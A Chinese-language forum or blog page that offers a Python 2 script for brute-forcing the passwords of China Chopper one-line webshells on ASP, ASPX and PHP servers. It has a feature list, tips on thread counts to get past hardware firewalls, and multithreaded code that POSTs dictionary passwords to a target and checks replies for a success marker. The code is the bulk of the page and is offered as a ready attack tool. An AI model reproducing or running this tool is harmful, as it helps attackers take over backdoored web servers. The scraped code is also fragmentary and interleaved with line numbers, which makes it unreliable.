功能:
1.破解菜刀用一句话密码~
2.全面支持asp,aspx,php
3.可调线程,默认5线程,建议有些网站线程不要太高,特别是有硬防的~
4.字典默认使用c:/password.txt , 可以自定义中
5.途按Q可以退出
代码:
1 |
#! /usr/bin/env python |
2 |
#coding=utf-8 |
3 |
|
4 |
import re,threading,Queue,os,httplib |
5 |
import msvcrt |
6 |
import gzip,StringIO |
9 |
####################################################### |
10 |
# # |
|
|
|
|
11 |
# chopper exploit v1.0 # |
12 |
# BY haxsscker#c0deplay.com # |
13 |
# team.f4ck.net # |
14 |
# # |
|
|
|
15 |
####################################################### |
16 |
''' |
17 |
|
18 |
class chopper(threading.Thread): |
19 |
def __init__(self): |
20 |
threading.Thread.__init__(self) |
21 |
self.conn = httplib.HTTPConnection(ztarget) |
22 |
def run(self): |
23 |
while 1: |
24 |
if queue.empty()== True: |
25 |
self.conn.close() |
26 |
break |
27 |
self.expcp() |
28 |
def expcp(self): |
29 |
self.password = str(queue.get()) |
30 |
print "testing--->"+self.password |
31 |
self.params = self.password+params |
32 |
try: |
33 |
self.conn.request(method="POST",url=target,body=self.params,headers=headers) |
34 |
self.response = self.conn.getresponse() |
|
|
|
|
35 |
if ('content-encoding', 'gzip') in self.response.getheaders(): |
36 |
self.compressedstream = StringIO.StringIO(self.response.read()) |
37 |
self.gzipper = self.gzip.GzipFile(fileobj=self.compressedstream) |
38 |
self.data = self.gzipper.read() |
39 |
else: |
40 |
self.data = self.response.read() |
41 |
if(self.data.find("jinlaile") >= 0): |
42 |
print "\n!!!!----PASS FIND!!! -------------->"+self.password |
43 |
os._exit(1) |
44 |
except Exception,e: |
47 |
|
48 |
class ThreadGetKey(threading.Thread): |
49 |
def run(self): |
50 |
try: |
51 |
chr = msvcrt.getch() |
52 |
if chr == 'q': |
53 |
print "stopped by your action ( q )" |
54 |
os._exit(1) |
55 |
except: |
56 |
os._exit(1) |
&nbs
补充:综合编程 , 安全编程 ,